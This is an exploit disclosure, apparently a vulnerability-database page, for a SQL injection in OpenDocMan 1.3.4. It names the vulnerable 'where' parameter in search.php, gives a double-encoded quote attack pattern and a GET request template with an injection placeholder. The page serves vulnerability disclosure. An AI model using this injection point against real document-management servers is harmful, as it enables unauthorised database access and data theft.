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OpenDocMan 1.3.4 SQL Injection

🗓️ 05 Mar 2019 00:00:00Reported by Mehmet EmirogluType 
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OpenDocMan 1.3.4 SQL Injection CVE: N/

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`===========================================================================================  
# Exploit Title: OpenDocMan 1.3.4 - awherea SQL Injection  
# CVE: N/A  
# Date: 05/03/2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://sourceforge.net/projects/opendocman/files/  
# Software Link: https://sourceforge.net/projects/opendocman/files/  
# Version: v1.3.4  
# Category: Webapps  
# Tested on: Wamp64, @Win  
# Software description: OpenDocMan is a web based document management  
system (DMS) written in PHP designed  
to comply with ISO 17025 and OIE standard for document management.  
It features fine grained control of access to files, and automated  
install and upgrades.  
===========================================================================================  
# POC - SQLi  
# Parameters : where  
# Attack Pattern : %2527  
# GET Request :  
http://localhost/opendocman/search.php?submit=submit&sort_by=id&where=[SQL Inject Here]&sort_order=asc&keyword=Training Manual&exact_phrase=on  
===========================================================================================  
`

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05 Mar 2019 00:00Current
7.4High risk
Vulners AI Score7.4
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